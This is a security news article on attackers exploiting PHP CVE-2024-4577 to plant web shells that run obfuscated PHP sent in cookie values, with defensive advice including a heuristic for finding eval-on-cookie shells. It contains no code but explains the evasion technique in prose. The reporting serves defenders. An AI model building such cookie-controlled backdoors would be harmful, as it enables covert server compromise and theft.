A threat actor doesn’t always need a zero-day exploit or a sophisticated toolchain to compromise a web server. Sometimes a cookie is enough.
Microsoft’s threat intelligence team recently disclosed the technical anatomy of a PHP-based attack chain that grants remote code execution through a mechanism so minimal it could easily be missed by conventional security monitoring. The vulnerability, tracked as CVE-2024-4577, affects PHP installations running in CGI mode on Windows systems. It was patched in June 2024. But exploitation in the wild has continued — and the tradecraft behind it is getting sharper.
According to The Hacker News, Microsoft detailed how attackers are using the flaw to install persistent backdoors that are controlled entirely through HTTP cookie values. The approach is notable for its stealth. No suspicious URL parameters. No encoded payloads in POST bodies. Just a cookie header carrying obfuscated instructions that the compromised server interprets and executes.
That’s the core of what makes this campaign dangerous. The command-and-control channel hides in plain sight, embedded in what looks like routine web traffic.
CVE-2024-4577 itself is a character encoding bypass in PHP-CGI on Windows. It allows an attacker to inject arguments into the PHP binary through specially crafted URL queries, effectively turning a web request into arbitrary code execution. The vulnerability was originally reported by Orange Tsai of Devcore and disclosed in coordination with PHP maintainers. A patch was released with PHP versions 8.3.8, 8.2.20, and 8.1.29. Yet as is often the case, patching adoption has been uneven, leaving thousands of servers exposed months after the fix became available.
Microsoft’s analysis, published by its Threat Intelligence team, goes beyond the initial exploitation vector. What caught researchers’ attention was the post-exploitation behavior — specifically, the way attackers established persistence and maintained access without deploying traditional malware binaries or command-line tools that would trigger endpoint detection.
The attack begins with exploitation of CVE-2024-4577 to drop a lightweight PHP web shell onto the target server. This shell doesn’t accept commands through GET or POST parameters, which are commonly logged and inspected by web application firewalls. Instead, it reads a specific cookie from incoming HTTP requests, decodes the value, and passes it to PHP’s eval() function. The result: arbitrary PHP code execution triggered by what appears, in most log files, to be a completely normal HTTP request.
Clever. And hard to detect.
The cookie-based control mechanism means that even organizations with decent network monitoring may not notice anything unusual. Standard intrusion detection systems tend to focus on URL strings, POST payloads, and known malicious user-agent strings. Cookies, while logged in some configurations, are frequently overlooked in automated analysis pipelines. The attackers clearly understood this blind spot.
Microsoft noted that the threat actors used this access for a range of follow-on activities: reconnaissance of the server environment, credential harvesting, lateral movement within the network, and in some cases, deployment of additional tooling for data exfiltration. The initial foothold — that tiny PHP shell — served as the launchpad for everything else.
The campaign isn’t attributed to a single threat group with high confidence, but Microsoft indicated that the activity clusters overlap with patterns previously associated with threat actors operating out of East Asia. Some of the infrastructure and tactics bear resemblance to groups that have historically targeted organizations in Japan, as well as educational institutions and technology firms across the Asia-Pacific region. Cisco’s Talos intelligence division had previously flagged exploitation of CVE-2024-4577 against Japanese targets in mid-2024, lending additional weight to the geographic focus.
So why does this matter now, nearly two years after the patch was released?
Because the attack surface hasn’t shrunk as much as it should have. PHP remains one of the most widely deployed server-side languages on the internet, powering roughly 75% of websites whose server-side language is known, according to W3Techs. While the specific CGI configuration required for CVE-2024-4577 is more common in certain deployment patterns — particularly legacy Windows-based hosting environments — the sheer volume of PHP installations means even a small percentage of vulnerable servers represents a significant number of targets.
And the attackers know this. Scanning activity for CVE-2024-4577 has remained elevated throughout 2025, according to data from the Shadowserver Foundation, which tracks internet-wide exploitation attempts. The vulnerability consistently appears in top-exploited lists published by cybersecurity agencies, including CISA’s Known Exploited Vulnerabilities catalog, where it was added shortly after initial exploitation reports surfaced.
Microsoft’s technical write-up also highlights an operational security discipline among the attackers that goes beyond the cookie trick. The web shells observed were frequently modified between deployments — small changes in variable names, encoding schemes, and cookie key names that made static signature detection unreliable. Some variants used XOR encoding on the cookie payload. Others used base64 with custom alphabets. The mutations weren’t dramatic, but they were enough to evade hash-based detection and simple pattern matching.
This is a textbook example of what the security industry calls “living off the land” — but adapted for the web application layer. Rather than abusing native operating system tools like PowerShell or WMI, the attackers are living off PHP itself, using its built-in functions as weapons. The server does exactly what it’s designed to do: execute PHP code. The problem is who’s supplying that code.
The implications for defenders are uncomfortable. Traditional endpoint detection and response tools are designed for workstation and server operating systems, not for inspecting the semantic content of web application traffic at the cookie level. Web application firewalls can help, but only if they’re configured to inspect cookie values — and many default configurations don’t. Log analysis can surface anomalies, but only if cookie headers are being captured in the first place, which is far from universal.
What should organizations actually do? First, the obvious: patch. Any PHP installation on Windows running in CGI mode should have been updated long ago, but the persistence of exploitation activity suggests many haven’t been. Second, audit web server configurations. PHP-CGI on Windows is a legacy deployment model that most modern applications don’t require. Migrating to PHP-FPM or mod_php eliminates the attack surface entirely. Third, inspect web shells. Microsoft published indicators of compromise including file hashes and behavioral signatures for the cookie-parsing shells. Security teams should sweep web-accessible directories for PHP files that reference cookie values in conjunction with eval(), assert(), or similar dynamic execution functions.
Fourth — and this is where it gets harder — organizations need to reconsider what they’re logging. If HTTP cookie headers aren’t captured in web server access logs, an entire class of command-and-control activity becomes invisible. Enabling cookie logging introduces storage and privacy considerations, but the alternative is flying blind against exactly this kind of threat.
The broader pattern here isn’t new. Attackers have long favored web shells as persistence mechanisms because they’re lightweight, flexible, and blend into the application environment. What’s evolving is the sophistication of the control channels. Moving from URL parameters to POST bodies to cookies represents a steady migration toward less-inspected parts of the HTTP protocol. The logical next step — and one that some researchers have already demonstrated in proof-of-concept work — is command delivery through HTTP headers like Accept-Language or Referer, fields that are almost never subjected to security inspection.
Microsoft’s disclosure is a reminder that vulnerability management doesn’t end with a CVE number and a patch release. The real story plays out in the months and years afterward, as attackers refine their exploitation techniques against the long tail of unpatched systems. CVE-2024-4577 isn’t a new vulnerability. But the tradecraft built on top of it is still maturing.
And that’s the part that should worry defenders most.
WebProNews is an iEntry Publication